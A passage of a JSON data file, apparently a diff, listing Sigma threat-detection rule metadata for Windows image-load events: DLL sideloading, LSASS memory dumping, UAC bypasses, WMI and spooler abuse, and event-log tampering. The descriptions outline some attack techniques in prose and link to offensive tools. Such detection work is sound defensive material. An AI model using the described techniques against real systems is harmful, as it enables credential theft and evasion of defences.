"https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pingback_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.001" - ], - "creation_date": "2021/05/05", - "filename": "image_load_pingback_backdoor.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": 
"image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93", - "value": "Rundll32 Loading Renamed Comsvcs DLL", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1555200155351228419", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml" - ], - "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" - ], - "creation_date": "2022/08/14", - "filename": "image_load_rundll32_loading_renamed_comsvcs.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects signs of the WMI script host process %SystemRoot%\\system32\\wbem\\scrcons.exe functionality being used via images being loaded by a process.", - "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", - "value": "WMI Script Host Process Image Loaded", - "meta": { - "refs": [ - "https://twitter.com/HunterPlaybook/status/1301207718355759107", - "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" - ], - "creation_date": "2020/09/02", - "filename": "image_load_scrcons_imageload_wmi_scripteventconsumer.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is 
known to cause false positives when brightness is changed by the corresponding keyboard button" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", - "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", - "value": "Antivirus Software DLL Sideloading", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/08/17", - "filename": "image_load_side_load_antivirus.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "level": "medium", - "falsepositive": [ - "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", - "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", - "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "value": "DLL Sideloading Of DBGCORE.DLL", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/10/25", - "filename": "image_load_side_load_dbgcore_dll.yml", - "author": "Nasreddine Bencherchali, Wietze 
Beukema (project and research)", - "level": "medium", - "falsepositive": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784", - "value": "DLL Sideloading Of DBGHELP.DLL", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/10/25", - "filename": "image_load_side_load_dbghelp_dll.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "level": "medium", - "falsepositive": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "value": "System DLL Sideloading From Non System Locations", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", - "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/08/14", - "filename": 
"image_load_side_load_from_non_system_location.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)", - "level": "medium", - "falsepositive": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", - "value": "Microsoft Office DLL Sideload", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/08/17", - "filename": "image_load_side_load_office_dlls.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system", - "uuid": "bc3cc333-48b9-467a-9d1f-d44ee594ef48", - "value": "SCM DLL Sideload", - "meta": { - "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_scm.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/12/01", - "filename": 
"image_load_side_load_scm.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", - "uuid": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", - "value": "Third Party Software DLL Sideloading", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/08/17", - "filename": "image_load_side_load_third_party.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", - "uuid": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", - "value": "VMGuestLib DLL Sideload", - "meta": { - "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/12/01", - "filename": "image_load_side_load_vmguestlib.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "FP could occure if the legitimate version of vmGuestLib already exists on the system" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of DLLs that are part of web 
browsers", - "uuid": "72ca7c75-bf85-45cd-aca7-255d360e423c", - "value": "Web Browsers DLL Sideloading", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_web_browsers.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/08/17", - "filename": "image_load_side_load_web_browsers.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects SILENTTRINITY stager use", - "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", - "value": "SILENTTRINITY Stager Execution - DLL", - "meta": { - "refs": [ - "https://github.com/byt3bl33d3r/SILENTTRINITY", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_silenttrinity_stage_use.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071" - ], - "creation_date": "2019/10/22", - "filename": "image_load_silenttrinity_stage_use.yml", - "author": "Aleksey Potapov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detect DLL Load from Spooler Service backup folder", - "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", - "value": "Windows Spooler Service Suspicious Binary Load", - "meta": { - "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/ly4k/SpoolFool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675", - "cve.2021.34527" - ], - "creation_date": 
"2021/06/29", - "filename": "image_load_spoolsv_dll_load.yml", - "author": "FPT.EagleEye, Thomas Patzke (improvements)", - "level": "informational", - "falsepositive": [ - "Loading of legitimate driver" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of advapi31.dll by a process running in an uncommon folder", - "uuid": "d813d662-785b-42ca-8b4a-f7457d78d5a9", - "value": "Suspicious Load of Advapi31.dll", - "meta": { - "refs": [ - "https://github.com/hlldz/Phant0m", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_advapi32_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "creation_date": "2022/02/03", - "filename": "image_load_susp_advapi32_dll.yml", - "author": "frack113", - "level": "informational", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", - "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1", - "value": "Cmstp Suspicious DLL Load", - "meta": { - "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_cmstp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ], - "creation_date": "2022/08/30", - "filename": "image_load_susp_cmstp.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use 
MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "uuid": "0e277796-5f23-4e49-a490-483131d4f6e1", - "value": "Load of dbghelp/dbgcore DLL from Suspicious Process", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", - "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", - "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2019/10/27", - "filename": "image_load_susp_dbghelp_dbgcore_load.yml", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", - "uuid": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", - "value": "DLL Load By System Process From Suspicious Locations", - "meta": { - "refs": [ - "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "creation_date": "2022/07/17", - "filename": "image_load_susp_dll_load_system_process.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "The Fax service 
attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "uuid": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "value": "Fax Service DLL Search Order Hijack", - "meta": { - "refs": [ - "https://windows-internals.com/faxing-your-way-to-system/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_fax_dll.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2020/05/04", - "filename": "image_load_susp_fax_dll.yml", - "author": "NVISO", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects any assembly DLL being loaded by an Office Product", - "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a", - "value": "dotNET DLL Loaded Via Office Applications", - "meta": { - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_assembly_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/02/19", - "filename": "image_load_susp_office_dotnet_assembly_dll_load.yml", - "author": "Antonlovesdnb", - "level": "high", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects CLR DLL being loaded by an Office Product", - "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "value": "CLR DLL Loaded Via Office Applications", - "meta": { - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_clr_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/02/19", - "filename": "image_load_susp_office_dotnet_clr_dll_load.yml", - "author": "Antonlovesdnb", - "level": "high", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects any GAC DLL being loaded by an Office Product", - "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "value": "GAC DLL Loaded Via Office Applications", - "meta": { - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_gac_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/02/19", - "filename": "image_load_susp_office_dotnet_gac_dll_load.yml", - "author": "Antonlovesdnb", - "level": "high", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DSParse DLL being loaded by an Office Product", - "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "value": "Active Directory Parsing DLL Loaded Via Office Applications", - "meta": { - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dsparse_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/02/19", - "filename": "image_load_susp_office_dsparse_dll_load.yml", - "author": 
"Antonlovesdnb", - "level": "high", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects Kerberos DLL being loaded by an Office Product", - "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", - "value": "Active Directory Kerberos DLL Loaded Via Office Applications", - "meta": { - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_kerberos_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/02/19", - "filename": "image_load_susp_office_kerberos_dll_load.yml", - "author": "Antonlovesdnb", - "level": "high", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", - "uuid": "cbb56d62-4060-40f7-9466-d8aaf3123f83", - "value": "Python Py2Exe Image Load", - "meta": { - "refs": [ - "https://www.py2exe.org/", - "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.002" - ], - "creation_date": "2020/05/03", - "filename": "image_load_susp_python_image_load.yml", - "author": "Patrick St. 
John, OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Legitimate Py2Exe Binaries", - "Known false positive caused with Python Anaconda" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects CLR DLL being loaded by an scripting applications", - "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", - "value": "CLR DLL Loaded Via Scripting Applications", - "meta": { - "refs": [ - "https://github.com/tyranid/DotNetToJScript", - "https://thewover.github.io/Introducing-Donut/", - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2020/10/14", - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml", - "author": "omkar72, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for processes loading System.Drawing.ni.dll. 
This could be an indicator of potential Screen Capture.", - "uuid": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", - "value": "Suspicious System.Drawing Load", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/16", - "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_system_drawing_load.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ], - "creation_date": "2020/05/02", - "filename": "image_load_susp_system_drawing_load.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "uuid": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "value": "Possible Process Hollowing Image Loading", - "meta": { - "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_uncommon_image_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2018/01/07", - "filename": "image_load_susp_uncommon_image_load.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Very likely, needs more tuning" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the image load of VSS DLL by uncommon executables", - "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", - "value": "Image Load of VSS Dll by Uncommon Executable", - "meta": { - "refs": [ - "https://github.com/ORCx41/DeleteShadowCopies", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_dll_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" - ], - "creation_date": "2022/10/31", - "filename": "image_load_susp_vss_dll_load.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", - "value": "Image Load of VSS_PS.dll by Uncommon Executable", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", - "https://twitter.com/am0nsec/status/1412232114980982787", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" - ], - "creation_date": "2021/07/07", - "filename": "image_load_susp_vss_ps_load.yml", - "author": "Markus Neis, @markus_neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL's Loaded Via Word Containing VBA Macros", - "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", - "value": "VBA DLL Loaded Via Microsoft Word", - "meta": { - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_winword_vbadll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/02/19", - "filename": "image_load_susp_winword_vbadll_load.yml", - "author": "Antonlovesdnb", - "level": "high", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as 
appropriate" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "value": "Svchost DLL Search Order Hijack", - "meta": { - "refs": [ - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_svchost_dll_search_order_hijack.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" - ], - "creation_date": "2019/10/28", - "filename": "image_load_svchost_dll_search_order_hijack.yml", - "author": "SBousseaden", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs", - "uuid": "49329257-089d-46e6-af37-4afce4290685", - "value": "SharpEvtMute Imphash EvtMuteHook Load", - "meta": { - "refs": [ - "https://github.com/bats3c/EvtMute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2022/09/07", - "filename": "image_load_sysmon_disable_sharpevtmute.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other DLLs with that import hash" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of Time Travel Debugging 
Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "value": "Time Travel Debugging Utility Usage - Image", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", - "https://twitter.com/mattifestation/status/1196390321783025666", - "https://twitter.com/oulusoyum/status/1191329746069655553", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" - ], - "creation_date": "2020/10/06", - "filename": "image_load_tttracer_mod_load.yml", - "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", - "level": "high", - "falsepositive": [ - "Legitimate usage by software developers/testers" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456", - "value": "UAC Bypass Using Iscsicpl - ImageLoad", - "meta": { - "refs": [ - "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", - "https://twitter.com/wdormann/status/1547583317410607110", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2022/07/17", - "filename": "image_load_uac_bypass_iscsicpl.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Attempts to load dismcore.dll after dropping it", - 
"uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "value": "UAC Bypass With Fake DLL", - "meta": { - "refs": [ - "https://steemit.com/utopian-io/@ah101/uac-bypassing-utility", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" - ], - "creation_date": "2020/10/06", - "filename": "image_load_uac_bypass_via_dism.yml", - "author": "oscd.community, Dmitry Uchakin", - "level": "high", - "falsepositive": [ - "Actions of a legitimate telnet client" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", - "uuid": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", - "value": "UIPromptForCredentials DLLs", - "meta": { - "refs": [ - "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", - "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" - ], - "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" - ], - "creation_date": 